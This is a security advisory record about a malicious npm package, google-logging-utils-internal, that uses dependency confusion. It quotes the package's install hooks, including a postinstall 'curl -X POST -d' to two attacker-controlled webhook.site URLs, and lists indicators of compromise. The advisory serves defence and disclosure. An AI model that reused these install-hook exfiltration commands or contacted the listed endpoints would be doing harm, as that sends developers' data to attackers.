VDB

GCVE-110-OSM-2026-5912

GCVE-110-OSM-2026-5912
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 14, 2026
This package implements a classic dependency-confusion exfiltration attack. The postinstall script executes `curl -X POST -d` to two hardcoded webhook.site endpoints (https://webhook.site/d7a413ff-8c38-4276-a2f4-a5be943cdda7 and https://webhook.site/5eb35918-f014-45e8-a5c0-e2ac953b50df), which are attacker-controlled OAST collection points — data is exfiltrated on every install. The preinstall and install hooks additionally run `node index.js`, providing a secondary execution vector. The publisher frengki0707 already has three confirmed malicious packages in OSM (@frengki0707/google-cloud-clone, frank-bot-gogle-cloning, frank-research-poc-apple), and the inflated version 9.9.9 is a textbook dependency-confusion probe designed to outrank any internal package of the same name. The library facade (genkit-based Google Cloud telemetry) is a plausible lure to maximize install surface against Google Cloud SDK consumers. ENTRY package/lib/index.js (default-index: index.js) - Install Hook Executes Local JS File in package.json: ""preinstall": "node index.js"" - Postinstall Script in package/package.json: ""postinstall": "curl -X POST -d \"" - Postinstall Script in package.json: ""postinstall": "sleep 10 && curl -X POST -d \"" DESTINATION - webhookServices: https://webhook.site/d7a413ff-8c38-4276-a2f4-a5be943cdda7 (exfil, plaintext) - webhookServices: https://webhook.site/5eb35918-f014-45e8-a5c0-e2ac953b50df (exfil, plaintext) EXFIL - OAST/Interactsh Exfiltration in package/package.json: "webhook.site" - OAST/Interactsh Exfiltration in package.json: "webhook.site" ADDITIONAL FINDINGS - Publisher Has Other Malicious Packages - Rapid Version Publishing PAYLOAD FILES package/package.json INDICATORS (IOCs) - urls: https://genkit.dev/docs/get-started/ - domains: genkit.dev, genkit.com - emails: test@genkit.com - payloadFileHash: b2b49d5f12940e10ce517841fa6119bd7e2dd5ecb6dd4d8f5f40337fc4e59d4e

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowngoogle-logging-utils-internalall (affected)

Browse GCVE Records

73,443 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›